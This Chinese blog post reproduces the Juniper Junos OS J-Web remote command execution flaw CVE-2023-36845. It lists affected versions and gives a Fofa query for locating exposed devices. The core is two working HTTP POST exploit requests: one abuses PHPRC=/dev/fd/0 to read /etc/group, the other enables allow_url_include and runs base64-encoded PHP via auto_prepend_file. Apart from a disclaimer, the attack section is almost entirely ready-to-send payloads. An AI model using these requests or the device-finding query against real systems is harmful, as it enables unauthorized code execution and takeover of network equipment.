码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)


    Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

    • 免责声明
    • 漏洞描述
    • 漏洞影响
    • 漏洞危害
    • 网络测绘
      • Fofa: body="J-web" || title="Juniper Web Device Manager"
    • 漏洞复现
      • 1. 构造poc
      • 2. 查看文件
      • 3. 执行命令

    免责声明

    仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
    任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
    该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
    作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

    漏洞描述

    Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。该操作系统提供了安全编程接口和Junos SDK。Juniper Networks Junos OS EX存在安全漏洞,该漏洞源于J-Web模块存在PHP外部变量修改漏洞。允许未经身份验证的网络攻击者控制某些重要的环境变量。攻击者利用特制请求可以修改某个PHP环境变量,造成部分完整性损失,这可能允许链接到其他漏洞。

    漏洞影响

    Juniper Networks Junos OS: 所有版本早于21.4R3-S5;22.1版本早于22.1R3-S4;22.2版本早于22.2R3-S2;22.3版本早于22.3R2-S2、22.3R3-S1;22.4版本早于22.4R2-S1、22.4R3;23.2版本早于23.2R1-S1、23.2R2。

    漏洞危害

    执行操作系统命令,获取服务器权限,接管服务器

    网络测绘

    Fofa: body=“J-web” || title=“Juniper Web Device Manager”

    在这里插入图片描述在这里插入图片描述

    漏洞复现

    1. 构造poc

    POST /?PHPRC=/dev/fd/0 HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 30
    
    auto_prepend_file="/etc/group"
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    2. 查看文件

    在这里插入图片描述

    3. 执行命令

    POST /?PHPRC=/dev/fd/0 HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 90
    
    allow_url_include=1
    auto_prepend_file="data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+"
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11

    在这里插入图片描述

  • 相关阅读:
    为什么在华为DSTE战略管理中,需要三次战略解码?
    定制你的清爽Mac版Edge浏览器
    【深度学习】PyTorch深度学习笔记02-线性模型
    一台机器下,多个Java版本的粗放与精细管理
    前馈神经网络
    学大数据技术与应用的女生多吗?适合吗?
    heic文件怎么转换成jpg?实用图片格式转换方法分享
    vite项目require语法兼容问题解决require is not defined
    线性代数学习笔记8-1:复数矩阵与Hermite矩阵、酉矩阵、傅里叶矩阵和快速傅里叶变换FFT
    vivo霍金实验平台设计与实践-平台产品系列02
  • 原文地址:https://blog.csdn.net/weixin_44304678/article/details/134274956
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号